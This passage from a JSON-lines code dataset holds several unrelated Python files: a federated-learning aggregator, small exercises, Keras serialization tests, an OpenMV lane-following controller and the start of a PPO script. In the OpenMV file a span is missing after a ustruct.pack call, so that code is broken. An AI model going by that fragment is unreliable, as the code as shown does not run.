self._fetch_weights(tag)\n if tag == TAG_AGGREGATE:\n self._aggregate_weights(tag)\n\n def put(self, tag: str) -> None:\n \"\"\"Set data to remote role(s).\"\"\"\n if tag == TAG_UPLOAD:\n self._send_weights(tag)\n if tag == TAG_DISTRIBUTE:\n self._distribute_weights(tag)\n\n def _fetch_weights(self, tag: str) -> None:\n logger.debug(\"calling _fetch_weights\")\n channel = self.cm.get_by_tag(tag)\n if not channel:\n logger.debug(f\"[_fetch_weights] channel not found with tag {tag}\")\n return\n\n # this call waits for at least one peer to join this channel\n channel.await_join()\n\n # one aggregator is sufficient\n end = channel.one_end()\n msg, _ = channel.recv(end)\n\n if MessageType.WEIGHTS in msg:\n self.weights = msg[MessageType.WEIGHTS]\n\n if MessageType.EOT in msg:\n self._work_done = msg[MessageType.EOT]\n\n if MessageType.ROUND in msg:\n self._round = msg[MessageType.ROUND]\n\n def _distribute_weights(self, tag: str) -> None:\n channel = self.cm.get_by_tag(tag)\n if not channel:\n logger.debug(f\"channel not found for tag {tag}\")\n return\n\n # this call waits for at least one peer to join this channel\n self.trainer_no_show = channel.await_join(WAIT_TIME_FOR_TRAINER)\n if self.trainer_no_show:\n logger.debug(\"channel await join timeouted\")\n # send dummy weights to unblock top aggregator\n self._send_dummy_weights(TAG_UPLOAD)\n return\n\n for end in channel.ends():\n logger.debug(f\"sending weights to {end}\")\n channel.send(\n end,\n {\n MessageType.WEIGHTS: self.weights,\n MessageType.ROUND: self._round,\n },\n )\n\n def _aggregate_weights(self, tag: str) -> None:\n channel = self.cm.get_by_tag(tag)\n if not channel:\n return\n\n total = 0\n # receive local model parameters from trainers\n for msg, metadata in channel.recv_fifo(channel.ends()):\n end, _ = metadata\n if not msg:\n logger.debug(f\"No data from {end}; skipping it\")\n continue\n\n if MessageType.WEIGHTS in msg:\n weights = msg[MessageType.WEIGHTS]\n\n if MessageType.DATASET_SIZE in msg:\n count = msg[MessageType.DATASET_SIZE]\n\n logger.debug(f\"{end}'s parameters trained with {count} samples\")\n\n if weights is not None and count > 0:\n total += count\n tres = TrainResult(weights, count)\n # save training result from trainer in a disk cache\n self.cache[end] = tres\n\n logger.debug(f\"received {len(self.cache)} trainer updates in cache\")\n\n # optimizer conducts optimization (in this case, aggregation)\n global_weights = self.optimizer.do(\n deepcopy(self.weights), self.cache, total=total\n )\n if global_weights is None:\n logger.debug(\"failed model aggregation\")\n time.sleep(1)\n return\n\n # save global weights before updating it\n self.prev_weights = self.weights\n\n # set global weights\n self.weights = global_weights\n self.dataset_size = total\n\n def _send_weights(self, tag: str) -> None:\n logger.debug(\"calling _send_weights\")\n channel = self.cm.get_by_tag(tag)\n if not channel:\n logger.debug(f\"channel not found with {tag}\")\n return\n\n # this call waits for at least one peer to join this channel\n channel.await_join()\n\n # one aggregator is sufficient\n end = channel.one_end()\n\n delta_weights = self._delta_weights_fn(self.weights, self.prev_weights)\n\n msg = {\n MessageType.WEIGHTS: delta_weights,\n MessageType.DATASET_SIZE: self.dataset_size,\n MessageType.MODEL_VERSION: self._round,\n }\n channel.send(end, msg)\n logger.debug(\"sending weights done\")\n\n def _send_dummy_weights(self, tag: str) -> None:\n channel = self.cm.get_by_tag(tag)\n if not channel:\n logger.debug(f\"channel 
not found with {tag}\")\n return\n\n # this call waits for at least one peer to join this channel\n channel.await_join()\n\n # one aggregator is sufficient\n end = channel.one_end()\n\n dummy_msg = {MessageType.WEIGHTS: None, MessageType.DATASET_SIZE: 0}\n channel.send(end, dummy_msg)\n logger.debug(\"sending dummy weights done\")\n\n def update_round(self):\n \"\"\"Update the round counter.\"\"\"\n logger.debug(f\"Update current round: {self._round}\")\n\n channel = self.cm.get_by_tag(self.dist_tag)\n if not channel:\n logger.debug(f\"channel not found for tag {self.dist_tag}\")\n return\n\n # set necessary properties to help channel decide how to select ends\n channel.set_property(\"round\", self._round)\n\n def inform_end_of_training(self) -> None:\n \"\"\"Inform all the trainers that the training is finished.\"\"\"\n logger.debug(\"inform end of training\")\n\n channel = self.cm.get_by_tag(self.dist_tag)\n if not channel:\n logger.debug(f\"channel not found for tag {self.dist_tag}\")\n return\n\n channel.broadcast({MessageType.EOT: self._work_done})\n\n def compose(self) -> None:\n \"\"\"Compose role with tasklets.\"\"\"\n with Composer() as composer:\n self.composer = composer\n\n task_internal_init = Tasklet(\"internal_init\", self.internal_init)\n\n task_init = Tasklet(\"init\", self.initialize)\n\n task_load_data = Tasklet(\"load_data\", self.load_data)\n\n task_put_dist = Tasklet(\"distribute\", self.put, TAG_DISTRIBUTE)\n task_put_dist.set_continue_fn(cont_fn=lambda: self.trainer_no_show)\n\n task_put_upload = Tasklet(\"upload\", self.put, TAG_UPLOAD)\n\n task_get_aggr = Tasklet(\"aggregate\", self.get, TAG_AGGREGATE)\n\n task_get_fetch = Tasklet(\"fetch\", self.get, TAG_FETCH)\n\n task_eval = Tasklet(\"evaluate\", self.evaluate)\n\n task_update_round = Tasklet(\"update_round\", self.update_round)\n\n task_end_of_training = Tasklet(\"inform_eot\", self.inform_end_of_training)\n\n # create a loop object with loop exit condition function\n loop = Loop(loop_check_fn=lambda: self._work_done)\n (\n task_internal_init\n >> task_load_data\n >> task_init\n >> loop(\n task_get_fetch\n >> task_put_dist\n >> task_get_aggr\n >> task_put_upload\n >> task_eval\n >> task_update_round\n )\n >> task_end_of_training\n )\n\n def run(self) -> None:\n \"\"\"Run role.\"\"\"\n self.composer.run()\n\n @classmethod\n def get_func_tags(cls) -> list[str]:\n \"\"\"Return a list of function tags defined in the middle\n level aggregator role.\n \"\"\"\n return [TAG_DISTRIBUTE, TAG_AGGREGATE, TAG_FETCH, TAG_UPLOAD]\n","repo_name":"cisco-open/flame","sub_path":"lib/python/flame/mode/horizontal/syncfl/middle_aggregator.py","file_name":"middle_aggregator.py","file_ext":"py","file_size_in_byte":9948,"program_lang":"python","lang":"en","doc_type":"code","stars":36,"dataset":"github-code","pt":"37"} +{"seq_id":"42086659502","text":"vowels = ['A','E','I','O','U','a','e','i','o','u']\n\nwhile True:\n words = input()\n if words == '#':\n break\n count = 0\n for word in words:\n if word in vowels:\n count += 1\n print(count)","repo_name":"subinmun1997/my_python-for-coding-test","sub_path":"BAEKJOON/solution414.py","file_name":"solution414.py","file_ext":"py","file_size_in_byte":222,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"37"} +{"seq_id":"40103274177","text":"# -*- coding: utf-8 -*-\n## @package ivf.cmds.sparse_interpolation.bilateral_normal_smoothing\n#\n# ivf.cmds.sparse_interpolation.bilateral_normal_smoothing utility package.\n# @author tody\n# @date 
2016/02/03\n\nimport numpy as np\n\nfrom sklearn.utils import shuffle\n\nfrom ivf.core.image_features.image_features import positionFeatures, LabFeatures, foreGroundFeatures\nfrom scipy.interpolate.rbf import Rbf\nfrom ivf.cv.image import Lab2rgb, to8U, setAlpha, alpha\nfrom ivf.cv.normal import normalizeImage\n\n\ndef bilateralNormalSmoothing(image, normal):\n sigma_xy = 1.0\n xy = positionFeatures(image) / sigma_xy\n Lab = LabFeatures(image)\n foreground = foreGroundFeatures(image)\n\n N = normal[:, :, :3].reshape(-1, 3)\n\n LabxyN = np.concatenate((Lab, xy, N), axis=1)[foreground, :]\n sigma_L = 1.0\n LabxyN[:, 0] = LabxyN[:, 0] / sigma_L\n LabxyN_sparse = shuffle(LabxyN, random_state=0)[:100]\n\n N_smooth = np.array(N)\n\n smooth = 10.0\n\n f_x = np.vstack((LabxyN_sparse[:, :5].T, LabxyN_sparse[:, 5]))\n f_y = np.vstack((LabxyN_sparse[:, :5].T, LabxyN_sparse[:, 6]))\n f_z = np.vstack((LabxyN_sparse[:, :5].T, LabxyN_sparse[:, 7]))\n\n Nx_rbf = Rbf(*(f_x), function='linear', smooth=smooth)\n Ny_rbf = Rbf(*(f_y), function='linear', smooth=smooth)\n Nz_rbf = Rbf(*(f_z), function='linear', smooth=smooth)\n\n Labxy = LabxyN[:, :5]\n\n #Lab_smooth[:, 0] = L_rbf(Labxy[:, 0], Labxy[:, 1], Labxy[:, 2], Labxy[:, 3], Labxy[:, 4])\n N_smooth[foreground, 0] = Nx_rbf(*(Labxy.T))\n N_smooth[foreground, 1] = Ny_rbf(*(Labxy.T))\n N_smooth[foreground, 2] = Nz_rbf(*(Labxy.T))\n\n h, w = image.shape[:2]\n N_smooth = N_smooth.reshape((h, w, 3))\n\n N_smooth = normalizeImage(N_smooth)\n return N_smooth","repo_name":"tody411/ImageViewerFramework","sub_path":"ivf/core/sparse_interpolation/bilateral_normal_smoothing.py","file_name":"bilateral_normal_smoothing.py","file_ext":"py","file_size_in_byte":1747,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"4135757523","text":"# -*- coding: utf-8 -*-\n\nfrom . import controllers\nfrom . import models\n\nfrom odoo import api, SUPERUSER_ID\n\n# hook in library module\n\ndef post_init_hook(cr, registry):\n env = api.Environment(cr, SUPERUSER_ID, {})\n print(f'>>>>>>>>>>> post_init_hook run <<<<<<<<<<<<<<')\n # select m2o.name \n records = env['library.book'].search([])\n print(f'>>>>record:{records}<<<><<')\n for record in records:\n record.author_name = record.author_id.name\n print(f'set {record.author_id.name} to {record.author_name}')","repo_name":"Thierry014/henry_local_addon","sub_path":"hook_test/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":533,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"16334372306","text":"#\n# lane following controller for OpenMV, as used in DonKCar racers\n#\n# note this is a multi-module MicroPython program. 
Only the \"main\" module is managed directly\n# by the OpenMV IDE -- the other .py modules may be edited in the OpenMV IDE but must be manually\n# transferred to the camera board using file manager (don't forget to \"disconnhect\" the camera\n# using IDE connect icon AND eject it using file manager before disconnecting wires).\n#\n# note also that although the \"main\" module (which is managed by the IDE) can be run using the triangle\n# icon at bottom left of IDE, you must use \"Tools/Save Open Script to OpenMV Cam (as main.py)\" to\n# transfer it to the camera to make it bootable at camera power up.\n#\n\nimport sensor, image, pyb, math, time\nfrom pyb import LED\nfrom pyb import Pin, Timer\nimport ustruct\nimport ubinascii\nimport mypid # this is a \"local library\" and must be manually stored on OpenMV cam root folder\nimport utility # this is a \"local library\" and must be manually stored on OpenMV cam root folder\nimport communicator # this is a \"local library\" and must be manually stored on OpenMV cam root folder\nimport commands # this is a \"local library\" and must be manually stored on OpenMV cam root folder\nimport blob_tracker # this is a \"local library\" and must be manually stored on OpenMV cam root folder\nimport color_tracker # experimental replacement for blob_Tracker\nimport regression_tracker # this is a \"local library\" and must be manually stored on OpenMV cam root folder\n#import lanelines_tracker # this is a \"local library\" and must be manually stored on OpenMV cam root folder\n\n\n# initialze camera\nsensor.reset() # Initialize the camera sensor.\nsensor.__write_reg(0x6B, 0x22) # switches camera into advanced calibration mode. See this for more: http://forums.openmv.io/viewtopic.php?p=1358#p1358\nsensor.set_vflip(True)\nsensor.set_hmirror(True)\nsensor.set_auto_gain(True) # do some calibration at the start\nsensor.set_auto_whitebal(False)\nsensor.skip_frames(time = 0) # When you're inside, set time to 2000 to do a white balance calibration. Outside, this can be 0\n#sensor.set_auto_gain(False) # now turn off autocalibration before we start color tracking\n#sensor.set_auto_whitebal(False)\n\n\nutility.init_perspective_corrector()\nmypid.initialize_pid()\ncommunicator.init_communicator()\ncommands.init_commands(sensor)\n#blob_tracker.init_blob_params()\ncolor_tracker.init_blob_params()\nregression_tracker.init_line_params()\n#lanelines_tracker.init_lanelines_params()\nutility.set_cam_rez_for_blobs(sensor)\ncommands.set_mode('I', sensor)\nnextSendData = pyb.millis() + 100\nnextPID = pyb.millis() + 75\nnextDebug = pyb.millis() + 225\nwantDebug = False\n\nrho = 0\ntheta = 0\n\nlastServoCmdVal = 0\nout_buf = bytearray(10)\nclock = time.clock() # Tracks FPS\n\n#commands.set_mode('R', sensor) # TEMPORARY FOR DEBUGGING --------------------\n#img = sensor.snapshot() # TEMPORARY FOR DEBUGGING --------------------\n#img = sensor.snapshot() # TEMPORARY FOR DEBUGGING --------------------\n#img = sensor.snapshot() # TEMPORARY FOR DEBUGGING --------------------\n#img = sensor.snapshot() # TEMPORARY FOR DEBUGGING --------------------\n#color_tracker.preset_color_thresholds(img) # TEMPORARY FOR DEBUGGING --------------------\n\nwhile(True):\n clock.tick() # Track elapsed milliseconds between snapshots().\n if utility.get_histeq_wanted():\n img = sensor.snapshot().histeq() # Take a picture and return the image. The \"histeq()\" function does a histogram equalization to compensate for lighting changes\n else:\n img = sensor.snapshot() # Take a picture and return the image. 
The \"histeq()\" function does a histogram equalization to compensate for lighting changes\n\n if utility.get_negate_wanted():\n img.negate()\n\n utility.correct_perspective(img)\n\n # note blob_tracker returns desired target angle 0=straight, -45-ish max left, +45-ish max right\n if commands.get_mode() == 'B':\n #target_angle = blob_tracker.blob_track(img)\n target_angle = color_tracker.blob_track(img)\n\n # note regression line_tracker (1-line) returns desired target angle 0=straight, -45-ish max left, +45-ish max right\n if commands.get_mode() == 'R':\n #r, t, target_angle = regression_tracker.lines_track(img)\n target_angle = regression_tracker.lines_track(img)\n\n\n # note lane lines_tracker (1-line) returns desired target angle 0=straight, -45-ish max left, +45-ish max right\n # if commands.get_mode() == 'L':\n # target_angle = lanelines_tracker.lanelines_track(img)\n\n if (commands.get_mode() == 'G') or (commands.get_mode() == 'I') :\n target_angle = 0\n servo_angle = 0\n angle_error = 0\n\n # pid calculator expects target angle 0=straight, -45-ish max left, +45-ish max right\n # it returns angles in degrees per same model (0 is straight; -50 full left, +50 full right (constrained)))\n now = pyb.millis()\n if (now > nextPID): # time has passed since last measurement; do the PID at 50hz\n nextPID = now + 20\n if (commands.get_mode() == 'B'):\n angle_error, servo_angle = mypid.update_pid(target_angle)\n\n\n if (now > nextSendData) and (commands.get_mode() == 'B') and (commands.get_send_driving_info()):\n nextSendData = now + 100\n notused = 0\n checksum = 0\n # note PID function returns number between -50 and +50, so we scale it by 5 to get +/- 250 for servo command\n #servo_cmd_val = utility.constrain( (mypid.get_pid_steering_gain() * mypid.get_pid_steering_direction() * servo_angle), -255, 255)\n servo_cmd_val = utility.constrain( (5 * mypid.get_pid_steering_direction() * servo_angle), -255, 255)\n #if (abs(servo_cmd_val - lastServoCmdVal) > 2):\n #if (int(servo_cmd_val) != int(lastServoCmdVal)):\n if True:\n out_buf = ustruct.pack(\" nextDebug) and (wantDebug):\n nextDebug = now + 1000\n #print( \"target angle:\" + str(target_angle) + \" r:\" + str(r) + \" t:\" + str(t))\n","repo_name":"dnkorte/DonKCar","sub_path":"code_openmv/camera_code_v5.py","file_name":"camera_code_v5.py","file_ext":"py","file_size_in_byte":6717,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"4091940208","text":"import json\n\nimport numpy as np\nimport tensorflow.compat.v2 as tf\nfrom absl.testing import parameterized\n\nimport keras\nfrom keras.saving.experimental import serialization_lib\nfrom keras.saving.legacy import serialization\nfrom keras.testing_infra import test_utils\n\n\ndef custom_fn(x):\n return x**2\n\n\nclass CustomLayer(keras.layers.Layer):\n def __init__(self, factor):\n super().__init__()\n self.factor = factor\n\n def call(self, x):\n return x * self.factor\n\n def get_config(self):\n return {\"factor\": self.factor}\n\n\nclass NestedCustomLayer(keras.layers.Layer):\n def __init__(self, factor, dense=None, activation=None):\n super().__init__()\n self.factor = factor\n\n if dense is None:\n self.dense = keras.layers.Dense(1, activation=custom_fn)\n else:\n self.dense = serialization_lib.deserialize_keras_object(dense)\n if activation is None:\n self.activation = keras.layers.Activation(\"relu\")\n else:\n self.activation = serialization_lib.deserialize_keras_object(\n activation\n )\n\n def call(self, x):\n return self.dense(x 
* self.factor)\n\n def get_config(self):\n return {\n \"factor\": self.factor,\n \"dense\": self.dense,\n \"activation\": self.activation,\n }\n\n\nclass WrapperLayer(keras.layers.Layer):\n def __init__(self, layer, **kwargs):\n super().__init__(**kwargs)\n self.layer = layer\n\n def call(self, x):\n return self.layer(x)\n\n def get_config(self):\n config = super().get_config()\n return {\"layer\": self.layer, **config}\n\n\n@test_utils.run_v2_only\nclass SerializationLibTest(tf.test.TestCase, parameterized.TestCase):\n def roundtrip(self, obj, custom_objects=None):\n serialized = serialization_lib.serialize_keras_object(obj)\n json_data = json.dumps(serialized)\n json_data = json.loads(json_data)\n deserialized = serialization_lib.deserialize_keras_object(\n json_data, custom_objects=custom_objects\n )\n reserialized = serialization_lib.serialize_keras_object(deserialized)\n return serialized, deserialized, reserialized\n\n @parameterized.named_parameters(\n (\"str\", \"hello\"),\n (\"bytes\", b\"hello\"),\n (\"nparray_int\", np.array([0, 1])),\n (\"nparray_float\", np.array([0.0, 1.0])),\n (\"nparray_item\", np.float32(1.0)),\n (\"plain_types_list\", [\"hello\", 0, \"world\", 1.0, True]),\n (\"plain_types_dict\", {\"1\": \"hello\", \"2\": 0, \"3\": True}),\n (\"plain_types_nested_dict\", {\"1\": \"hello\", \"2\": [True, False]}),\n )\n def test_simple_objects(self, obj):\n serialized, _, reserialized = self.roundtrip(obj)\n self.assertEqual(serialized, reserialized)\n\n def test_builtin_layers(self):\n serialized, _, reserialized = self.roundtrip(keras.layers.Dense(3))\n self.assertEqual(serialized, reserialized)\n\n def test_tensors_and_tensorshape(self):\n x = tf.random.normal((2, 2), dtype=\"float64\")\n obj = {\"x\": x}\n _, new_obj, _ = self.roundtrip(obj)\n self.assertAllClose(x, new_obj[\"x\"], atol=1e-5)\n\n obj = {\"x.shape\": x.shape}\n _, new_obj, _ = self.roundtrip(obj)\n self.assertListEqual(x.shape.as_list(), new_obj[\"x.shape\"])\n\n def test_custom_fn(self):\n obj = {\"activation\": custom_fn}\n serialized, _, reserialized = self.roundtrip(\n obj, custom_objects={\"custom_fn\": custom_fn}\n )\n self.assertEqual(serialized, reserialized)\n\n # Test inside layer\n dense = keras.layers.Dense(1, activation=custom_fn)\n dense.build((None, 2))\n serialized, new_dense, reserialized = self.roundtrip(\n dense, custom_objects={\"custom_fn\": custom_fn}\n )\n x = tf.random.normal((2, 2))\n y1 = dense(x)\n _ = new_dense(x)\n new_dense.set_weights(dense.get_weights())\n y2 = new_dense(x)\n self.assertAllClose(y1, y2, atol=1e-5)\n\n def test_custom_layer(self):\n layer = CustomLayer(factor=2)\n x = tf.random.normal((2, 2))\n y1 = layer(x)\n serialized, new_layer, reserialized = self.roundtrip(\n layer, custom_objects={\"CustomLayer\": CustomLayer}\n )\n y2 = new_layer(x)\n self.assertAllClose(y1, y2, atol=1e-5)\n\n layer = NestedCustomLayer(factor=2)\n x = tf.random.normal((2, 2))\n y1 = layer(x)\n serialized, new_layer, reserialized = self.roundtrip(\n layer,\n custom_objects={\n \"NestedCustomLayer\": NestedCustomLayer,\n \"custom_fn\": custom_fn,\n },\n )\n _ = new_layer(x)\n new_layer.set_weights(layer.get_weights())\n y2 = new_layer(x)\n self.assertAllClose(y1, y2, atol=1e-5)\n\n def test_shared_object(self):\n input_1 = keras.Input((2,))\n input_2 = keras.Input((2,))\n shared_layer = keras.layers.Dense(1)\n output_1 = shared_layer(input_1)\n wrapper_layer = WrapperLayer(shared_layer)\n output_2 = wrapper_layer(input_2)\n model = keras.Model([input_1, input_2], [output_1, 
output_2])\n _, new_model, _ = self.roundtrip(\n model, custom_objects={\"WrapperLayer\": WrapperLayer}\n )\n\n self.assertIs(model.layers[2], model.layers[3].layer)\n self.assertIs(new_model.layers[2], new_model.layers[3].layer)\n\n\n@test_utils.run_v2_only\nclass BackwardsCompatibilityTest(tf.test.TestCase, parameterized.TestCase):\n def assert_old_format_can_be_deserialized(self, obj, custom_objects=None):\n old_config = serialization.serialize_keras_object(obj)\n revived = serialization_lib.deserialize_keras_object(\n old_config, custom_objects=custom_objects\n )\n new_config_1 = serialization_lib.serialize_keras_object(obj)\n new_config_2 = serialization_lib.serialize_keras_object(revived)\n self.assertEqual(new_config_1, new_config_2)\n\n def test_backwards_compatibility_with_old_serialized_format(self):\n optimizer = keras.optimizers.Adam(learning_rate=0.1)\n self.assert_old_format_can_be_deserialized(\n optimizer, custom_objects=vars(keras.optimizers)\n )\n activation = keras.activations.relu\n self.assert_old_format_can_be_deserialized(\n activation, custom_objects=vars(keras.activations)\n )\n initializer = keras.initializers.VarianceScaling(scale=2.0)\n self.assert_old_format_can_be_deserialized(\n initializer, custom_objects=vars(keras.initializers)\n )\n regularizer = keras.regularizers.L2(0.3)\n self.assert_old_format_can_be_deserialized(\n regularizer, custom_objects=vars(keras.regularizers)\n )\n constraint = keras.constraints.UnitNorm()\n self.assert_old_format_can_be_deserialized(\n constraint, custom_objects=vars(keras.constraints)\n )\n layer = keras.layers.Dense(2)\n self.assert_old_format_can_be_deserialized(\n layer, custom_objects=vars(keras.layers)\n )\n layer = keras.layers.MultiHeadAttention(2, 4)\n self.assert_old_format_can_be_deserialized(\n layer, custom_objects=vars(keras.layers)\n )\n\n # Custom objects\n layer = CustomLayer(2)\n self.assert_old_format_can_be_deserialized(\n layer, custom_objects={\"CustomLayer\": CustomLayer}\n )\n layer = keras.layers.Dense(1, activation=custom_fn)\n self.assert_old_format_can_be_deserialized(\n layer, custom_objects={**vars(keras.layers), \"custom_fn\": custom_fn}\n )\n\n\nif __name__ == \"__main__\":\n tf.test.main()\n","repo_name":"OpenSource-A-414/opensource-A--414","sub_path":"keras-master/keras/saving/experimental/serialization_lib_test.py","file_name":"serialization_lib_test.py","file_ext":"py","file_size_in_byte":7764,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"10656745166","text":"class GeoguessrException(Exception):\n \"\"\"\n Base exception for this library.\n \"\"\"\n\n def __init__(self, code, url, message):\n self.code = code\n self.url = url\n self.message = message\n\n def __str__(self):\n return self.message\n\n\nclass Forbidden(GeoguessrException):\n \"\"\"Raised if your login details are invalid.\"\"\"\n\n\nclass NotFound(GeoguessrException):\n \"\"\"Raised if a ressource such as a user can't be found.\"\"\"\n\n\nclass BadRequest(GeoguessrException):\n \"\"\"\n Raised when sending an invalid request such as a friend request to\n a user who already has a pending friend request.\n \"\"\"","repo_name":"Inkapa/geoguessr_api","sub_path":"geoguessr_api/exceptions.py","file_name":"exceptions.py","file_ext":"py","file_size_in_byte":637,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"37"} +{"seq_id":"71477143148","text":"import numpy as np\nfrom sklearn.linear_model import 
LinearRegression\n\nquantidade = int(input(\"Informe a quantidade de variáveis do modelo: \"))\nx_ = list(range(0,quantidade))\ny_ = list(range(0,quantidade))\n\nprint(\"Informe as \", quantidade, \" variáveis dependentes: \")\nfor n in range(0, quantidade):\n print(\"Informe o valor \", n+1)\n y_[n] = int(input())\n\nprint(\"Informe as \", quantidade, \" variáveis independentes: \")\nfor n in range(0, quantidade):\n print(\"Informe o valor \", n+1)\n x_[n] = int(input())\n\nprint(\"Informe o valor que quer prever \")\nprev = list(range(0,1))\nprev[0] = int(input())\n\nx_ = np.asarray(x_)\nx_ = x_.reshape(-1,1)\ny_ = np.asarray(y_)\n\nmodelo = LinearRegression()\nmodelo.fit(x_,y_)\n\nprev = np.asarray(prev)\nprev = prev.reshape(-1,1)\n\nresp = modelo.predict(prev.reshape(-1,1))\nprint(\"Resultado da Previsão: \", resp)","repo_name":"bfrancd236/Python","sub_path":"Regressão Linear - biblioteca/regressão.py","file_name":"regressão.py","file_ext":"py","file_size_in_byte":849,"program_lang":"python","lang":"pt","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"13649975575","text":"notas = []\nx = 0\nc = 0\n\nfor i in range(20):\n n = float(input(\"Digite a nota do aluno: \"))\n notas.append(n)\n\nfor n in notas:\n x = x + n\n\n#poderia usar a função de soma -> soma = sum(notas)\n\nmedia = x / len(notas)\n\nfor np in notas:\n if np > media:\n c = c + 1\n\nprint(f\"A média da turma foi {(media):.1f} e tiveram {c} alunos com nota acima da média.\")","repo_name":"thiagohgcoutinho/uniesp_introducao_a_programacao","sub_path":"Aula_12/Exerc_02.py","file_name":"Exerc_02.py","file_ext":"py","file_size_in_byte":371,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"38253756453","text":"from graphics import *\n\n#main window\nwindow = GraphWin(\"Window\",500,500)\nwindow.setBackground(\"lightgray\")\n\n#text on top of text box\nflagtext=Text(Point(250,220),\"enter country name from ( iraq ) or ( syria )\")\nflagtext.draw(window)\nflagtext.setFace(\"helvetica\")\nflagtext.setStyle(\"bold\")\n\n#text box\nent=Entry(Point(250,250),20)\nent.setFill(\"white\")\nent.draw(window)\n\n#button bg\nbutton_bg=Rectangle(Point(220,270),Point(280,290))\nbutton_bg.draw(window)\n#button\nbutton=Text(Point(250,280),\"submit\")\nbutton.setFace(\"helvetica\")\nbutton.setStyle(\"bold\")\nbutton.setOutline(\"black\")\nbutton.draw(window)\n\n\nwindow.getMouse()\nx=ent.getText()\n\n\nif x==\"iraq\":\n #iraq flag\n iraq_flag1=Rectangle(Point(100,300),Point(400,350))\n iraq_flag1.setFill(\"red\")\n iraq_flag2=Rectangle(Point(100,350),Point(400,400))\n iraq_flag2.setFill(\"white\")\n iraq_text=Text(Point(250,375),\"الله اكبر\")\n iraq_text.setSize(30)\n iraq_text.setFill(\"green\")\n iraq_text.setFace(\"helvetica\")\n iraq_flag3=Rectangle(Point(100,400),Point(400,450))\n iraq_flag3.setFill(\"black\")\n iraq_flag1.draw(window)\n iraq_flag2.draw(window)\n iraq_flag3.draw(window)\n iraq_text.draw(window)\nelif x==\"syria\":\n #syria flag\n syria_flag1=Rectangle(Point(100,300),Point(400,350))\n syria_flag1.setFill(\"red\")\n syria_flag2=Rectangle(Point(100,350),Point(400,400))\n syria_flag2.setFill(\"white\")\n star1=Polygon(Point(250,370),Point(260,370),Point(270 ,360),Point(280,370),Point(290,370),Point(280,380),Point(285,390),Point(270,385),Point(255,390),Point(260,380))\n star1.setFill(\"green\")\n star1.setWidth(0)\n star2=Polygon(Point(200,370),Point(210,370),Point(220 
,360),Point(230,370),Point(240,370),Point(230,380),Point(235,390),Point(220,385),Point(205,390),Point(210,380))\n star2.setFill(\"green\")\n star2.setWidth(0)\n syria_flag3=Rectangle(Point(100,400),Point(400,450))\n syria_flag3.setFill(\"black\")\n syria_flag1.draw(window)\n syria_flag2.draw(window)\n star1.draw(window)\n syria_flag3.draw(window)\n star2.draw(window)\nelse:\n print(\"wrong entry\")\n wrong_text=Text(Point(250,370),\"wrong entery\")\n wrong_text.setSize(30)\n wrong_text.setFill(\"black\")\n wrong_text.setFace(\"arial\")\n wrong_text.draw(window)\n\nprint(x)\nwindow.getMouse()\n","repo_name":"seifbasel/python-graphics-libraries-projects","sub_path":"flags.py","file_name":"flags.py","file_ext":"py","file_size_in_byte":2287,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"23592842188","text":"#!/usr/bin/env python3\n# -----------------------------------------------------------\n# generator_tracks.py\n# Defines a generator that can be used to get all of the tracks\n# for a particular artist.\n# Uses the Spotify top 100 list for 2017 from a csv file\n# -----------------------------------------------------------\n\nimport pandas as pd\n\n\nmusic = pd.read_csv('featuresdf.csv')\n\n\ndef tracks_by_artist(artist):\n for track in [t[1] for t in zip(music.artists, music.name) if t[0] == artist]:\n yield track\n\n\ndef tracks_by_artist2(artist):\n for track in music.name.loc[music['artists'] == artist]:\n yield track\n\n\nif __name__ == \"__main__\":\n a = tracks_by_artist(\"Ed Sheeran\")\n for x in a:\n print(x)\n\n a = tracks_by_artist2(\"Ed Sheeran\")\n for x in a:\n print(x)\n\n\"\"\"\nEd Sheeran tracks: \nShape of You\nCastle on the Hill\nGalway Girl\nPerfect\n\"\"\"\n","repo_name":"UWPCE-PythonCert-ClassRepos/Sp2018-Online","sub_path":"students/ChrisH/lesson02/generator_tracks.py","file_name":"generator_tracks.py","file_ext":"py","file_size_in_byte":895,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"74154096426","text":"# docs and experiment results can be found at https://docs.cleanrl.dev/rl-algorithms/ppo/#ppo_continuous_actionpy\nimport argparse\nimport os\nimport random\nimport time\nfrom distutils.util import strtobool\n\nimport gym\nimport numpy as np\nimport torch\nimport torch.nn as nn\nimport torch.optim as optim\nfrom torch.distributions.normal import Normal\nfrom tqdm import trange\n\n\ndef eval_policy(agent, env, eval_episodes: int = 10):\n \"\"\"For-loop sequential evaluation.\"\"\"\n t1 = time.time()\n avg_reward = 0.\n eval_step = 0\n for _ in range(eval_episodes):\n obs, done = env.reset(), False\n while not done:\n with torch.no_grad():\n action, _ = agent.sample_actions(torch.Tensor(obs[None]).to(device))\n next_obs, reward, done, _ = env.step(action.cpu().numpy().squeeze(0))\n avg_reward += reward\n eval_step += 1\n obs = next_obs\n avg_reward /= eval_episodes\n return avg_reward, eval_step, time.time() - t1\n\n\ndef parse_args():\n parser = argparse.ArgumentParser()\n parser.add_argument(\"--seed\", type=int, default=1)\n\n # Algorithm specific arguments\n parser.add_argument(\"--env-id\", type=str, default=\"HalfCheetah-v2\")\n parser.add_argument(\"--total-timesteps\", type=int, default=int(1e6))\n parser.add_argument(\"--learning-rate\", type=float, default=3e-4)\n parser.add_argument(\"--num-envs\", type=int, default=4)\n parser.add_argument(\"--num-steps\", type=int, default=2048)\n parser.add_argument(\"--gae\",\n type=lambda x: 
